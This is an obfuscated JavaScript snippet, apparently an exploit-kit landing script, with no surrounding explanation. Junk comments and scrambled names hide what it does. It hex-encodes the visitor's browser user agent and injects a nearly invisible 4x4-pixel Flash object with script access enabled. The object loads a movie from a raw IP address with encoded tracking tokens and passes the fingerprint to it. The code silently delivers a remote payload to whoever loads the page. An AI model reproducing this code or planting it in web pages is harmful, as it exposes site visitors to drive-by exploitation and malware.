/*s52779d60327hssfj98645fs*/function hgfgerdfgdf(num, width){/*s51524d74743hfj6403fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s37351d65025hfj77236fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s85018d59176hfj97277fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s63112d85832hfj96453fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd87067hfs*/c += b + d;/*s37459d43507hfj79422fs*/e += 1;}return c;}/*s48671dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.162/?MzM4NzA0&man=QrojxeDeARkmodcA14S9vqn30PVnR6eg5eL_BCMZQsQ-8OUHeQ52Q_2yrMkeMglxRKy6yIXmg&pan=xX_QMvWebRXQC53EKvrcT6NHMVHRHECL2YydmrHQefjaelWkzrLFTF_xozKASASG6_FtdfJRD&shop=NDg0MzY4ODg=", ghnvbn("http://188.225.33.162/?NDQ3NTY3&man=rojBeDeAdkmodcA14S9vqn30DVnR6eg5eL_xCMZQsQ-8OXHeQ52g_2yrMkdskmxxGF6FENjOge&pan=xXzQMvWebRXQCJ3EKvncT6NEMVHRH0CL2Y-dmrHTefjaeVWkzrHFTF_xozKASASG6_FtdfJSDQ&shop=MTcwODk2NDQ=","wexykukusw"));